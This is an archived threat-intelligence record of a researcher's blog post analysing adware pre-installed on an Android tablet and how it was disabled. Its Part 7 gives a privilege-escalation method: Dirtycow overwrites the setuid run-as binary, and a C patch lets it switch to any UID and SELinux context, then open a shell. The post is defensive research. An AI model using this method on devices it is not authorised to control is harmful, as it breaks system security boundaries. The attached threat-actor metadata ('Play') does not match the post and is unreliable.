{
	"id": "c7fbeceb-7abb-4fdc-88d0-e23fe79f5fb8",
	"created_at": "2026-04-06T00:08:27.523332Z",
	"updated_at": "2026-04-10T03:30:33.938241Z",
	"deleted_at": null,
	"sha1_hash": "fff920cb7e4afb0dfdf90bc6cce38c47992b3f4e",
	"title": "Collin Mulliner - Stuff I do and Things I Like",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 64812,
	"plain_text": "Collin Mulliner - Stuff I do and Things I Like\r\nArchived: 2026-04-05 15:13:23 UTC\r\nIn November I bought a cheap Android Tablet for a wall-mounted display (see this blog post: Android InfoPanel). After a couple of days (or weeks?) some overlay ads and warnings from Google Play about malicious apps suddenly appeared. I didn't have time to investigate so I just tried to close the apps and ads. This got more complicated since all of it was in Chinese. I ended up navigating the menu of what looked like a 3rd-party app store to uninstall an app named Retipuj that was flagged by Google Play for ad-fraud. All of this using Google Translate on my phone. This solution worked for a couple of days. Returning from my holiday trip I was greeted by overlay ads once again. Luckily I had some time on my hands to investigate. Here is a short write-up.\r\nPart 1, observations and hoping for an easy way out:\r\nI found one app that I didn't install (com.hero.filter); I uninstalled it via adb uninstall com.hero.filter. I tried Googling the package name but without success.\r\nRemoving the app didn't seem to do anything. Judging by the task bar there still seem to be a number of apps running, but checking via Settings/Apps and on the filesystem (/data/apps) no apps are installed. Every now and then a pop-up appears that looks like a 3rd party market trying to download and install apps. Installation is blocked by Google Play (verified apps, I assume).\r\nPart 2, looking at processes:\r\nI found two interesting-looking processes, net.atlas.utopia and android.hb.uys.pbuild; looking at their SELinux context they seem to be platform apps (u:r:platform_app:s0). These could be candidates (spoiler - they are). 
Using pm list packages -f I determined that net.atlas.utopia is installed in /system/priv-app/Kyz2203 with the data in /data/data/net.atlas.utopia.\r\npm list packages -f (only showing some interesting packages):\r\npackage:/data/app/com.hero.filter-1/base.apk=com.hero.filter\r\npackage:/system/app/AutoDialer/AutoDialer.apk=com.example\r\npackage:/system/priv-app/Kyz2203/Kyz2203.apk=net.atlas.utopia\r\npackage:/system/priv-app/reanimation/reanimation.apk=android.hb.uys.pbuild\r\nPart 3, a quick peek into net.atlas.utopia:\r\nPermissions: this app has like every permission you can think of, including install and delete packages, send SMS, read and write any setting and file. Further it has a number of app permissions that correspond to lenovo, oppo, huawei, and htc devices.\r\nhttps://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html\r\nPage 1 of 5\n\nThe app registers intent filters for a number of events: boot up, time zone change, package install/remove, outgoing calls, etc. It basically monitors everything that is going on on the device. Pretty shitty.\r\nThe data directory also contained a dex file with the name whatsappui1.dex. A quick Google search on whatsappui1 has one hit on team cymru's hash list: whatsappui1, with not much detail but identifying the file as being associated with ad-based malware.\r\nThe most interesting thing I found in this app is the use of a 3rd party library called DroidPlugin. DroidPlugin is a plugin framework for Android that allows running any third-party apk without installation, modification or repackaging. Seems like the perfect tool for malware distribution.\r\nPart 4, a quick peek into android.hb.uys.pbuild:\r\nPermissions are very similar to net.atlas.utopia, including the permissions corresponding to specific device manufacturers.\r\nThe manifest contains traces of ad related things. The library directory contains libiohook.so. The library contains symbols from Cydia Substrate. 
The library name appears in various search results that indicate ad related malware.\r\nThe asset directory contains a certificate ky_dsa_public.crt with no interesting issuer, and a jar file that contains a dex file and two .png files that contain ascii/text.\r\nPart 5, getting rid of it all:\r\nHow do we get rid of pre-installed software? The system partition is read-only so we can't uninstall it! The best idea that does not involve rooting and flashing new firmware is disabling the package using the package manager (pm disable net.atlas.utopia); this however requires system privileges. You don't have system privileges without rooting. You can disable apps via Settings but you can only disable them if they are in the list. The ones we want to disable are not in the list.\r\nHow do we get system? The tablet still runs a 3.10.72 kernel so it might be vulnerable to dirtycow. I checked using the tools from timwr and yes, it is vulnerable to dirtycow. Using my modified version of run-as as shown in my SafetyNet Talk we can become the system user and disable any package we want by running: pm disable PACKAGE.\r\nHere is the list of packages I disabled; so far no APKs are getting installed and I haven't seen any more ads.\r\npm list packages -d\r\npackage:com.mediatek.schpwronoff\r\npackage:android.hb.uys.pbuild\r\npackage:com.mediatek.ygps\r\npackage:com.android.htmlviewer\r\npackage:com.android.browser\r\npackage:com.hero.filter\r\npackage:com.example\r\npackage:com.svox.pico\r\npackage:com.opera.max.global\r\npackage:com.android.dreams.phototable\r\npackage:net.atlas.utopia\r\npackage:com.mediatek.weather\r\npackage:com.opera.max.loader\r\npackage:com.qihoo.appstore\r\npackage:com.fw.upgrade.sysoper\r\npackage:com.android.vpndialogs\r\nPart 7, Dirtycow trickery:\r\nAs described on my slides you can modify run-as.c from timwr to become any UID with almost 
any SELinux context (depending on the device's SELinux policy!). For our purpose we can become any UID and context that we require. Below are some notes on how this works.\r\nDirtycow lets you overwrite any file; that is how you replace /system/bin/run-as with your own binary. The binary cannot be bigger than the one you are overwriting. This might be a problem when you have a very, very small run-as (9k in my case).\r\nshell@KT107:/data/local/tmp $ ls -al /system/bin/run-as\r\n-rwsr-s--- root shell 9444 2018-09-27 03:44 run-as\r\nThe workaround I took was not using ndk-build to build run-as.c and instead manually running arm gcc. This will reduce the binary size due to discarding compiler flags used by the ndk. Another solution would be to just load a shared library from run-as to keep the binary size small.\r\nOnce you have my version of run-as you can become (almost) any user.\r\nshell@KT107:/data/local/tmp $ run-as 1000 u:r:platform_app:s0\r\nshell@KT107:/data/local/tmp $ id\r\nuid=1000(system) gid=1000(system) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(s\r\nSystem (UID 1000) allows you to poke around /data/app/* and /data/data. 
If you want to explore /data/data/APP you need to assume the UID and context of that app.\r\nshell@KT107:/data/data $ ls -al\r\ndrwxr-x--x u0_a13 u0_a13 u:object_r:app_data_file:s0 net.atlas.utopia\r\nrun-as 10013 u:r:platform_app:s0\r\nshell@KT107:/data/data $ id\r\nuid=10013(u0_a13) gid=10013(u0_a13) groups=1003(graphics),1004(input),1007(log),1011(adb),1015\r\nshell@KT107:/data/data/net.atlas.utopia $ ls -al\r\ndrwx------ u0_a13 u0_a13 2017-12-31 19:00 Plugin\r\ndrwxrwx--x u0_a13 u0_a13 2017-12-31 19:00 app_dex\r\ndrwxrwx--x u0_a13 u0_a13 2017-12-31 19:00 cache\r\ndrwxrwx--x u0_a13 u0_a13 2017-12-31 19:00 databases\r\ndrwx------ u0_a13 u0_a13 2017-12-31 19:00 fankingbox\r\nlrwxrwxrwx install install 2015-12-31 19:00 lib -\u003e /data/app-lib/net.atlas.utopia\r\ndrwxrwx--x u0_a13 u0_a13 2019-01-03 15:56 shared_prefs\r\n-rw------- u0_a13 u0_a13 9572 2019-01-03 15:54 whatsappui1.dex\r\nBelow is my patch for run-as.c. 
My version sets the UID from the first argument and the SELinux context from the second argument.\r\n--- run-as-crm.c 2019-01-03 17:54:41.153471054 -0500\r\n+++ run-as.c 2019-01-03 17:58:39.378353437 -0500\r\n@@ -28,6 +28,8 @@\r\n {\r\n LOGV(\"uid %s %d\", argv[0], getuid());\r\n \r\n+ int duid = atoi(argv[1]);\r\n+\r\n if (setresgid(0, 0, 0) || setresuid(0, 0, 0)) {\r\n LOGV(\"setresgid/setresuid failed\");\r\n }\r\n@@ -56,7 +58,7 @@\r\n LOGV(\"dlsym setcon error %s\", error);\r\n } else {\r\n setcon_t * setcon_p = (setcon_t*)setcon;\r\n- ret = (*setcon_p)(\"u:r:shell:s0\");\r\n+ ret = (*setcon_p)(argv[2]);\r\n ret = (*getcon_p)(\u0026secontext);\r\n LOGV(\"context %d %s\", ret, secontext);\r\n }\r\n@@ -66,6 +68,12 @@\r\n LOGV(\"no selinux?\");\r\n }\r\n \r\n+ if (setresgid(duid, duid, duid) || setresuid(duid, duid, duid)) {\r\n+ LOGV(\"setresgid/setresuid failed\");\r\n+ }\r\n+ LOGV(\"uid %d\", getuid());\r\n+\r\n system(\"/system/bin/sh -i\");\r\n \r\n-}\r\n\\ No newline at end of file\r\n+}\r\n+\r\nConclusions:\r\nOverall I would have preferred not to get pre-installed malware on my Android Tablet, as I would rather have spent my time on my InfoPanel app or on other projects. However it was impossible for me to ignore this issue and simply buy a different tablet. Tracking down the malware still was kinda fun. It was the first time I experienced the issue of pre-installed malware first hand. I'm also fairly happy that I didn't have to modify the firmware since this would have cost way more time. The most interesting thing I found was definitely the DroidPlugin project that allows running APKs without installing them. I wish I had more time to reverse engineer all the different apps and how they work together. 
I uploaded a zip file containing most components I talked about in this blog post here: yellyouth.zip.\r\nI hope I finally disabled all of the components and have an ad free device.\r\nSource: https://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.mulliner.org/blog/blosxom.cgi/security/yellyouth_android_malware.html"
	],
	"report_names": [
		"yellyouth_android_malware.html"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434107,
	"ts_updated_at": 1775791833,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fff920cb7e4afb0dfdf90bc6cce38c47992b3f4e.pdf",
		"text": "https://archive.orkl.eu/fff920cb7e4afb0dfdf90bc6cce38c47992b3f4e.txt",
		"img": "https://archive.orkl.eu/fff920cb7e4afb0dfdf90bc6cce38c47992b3f4e.jpg"
	}
}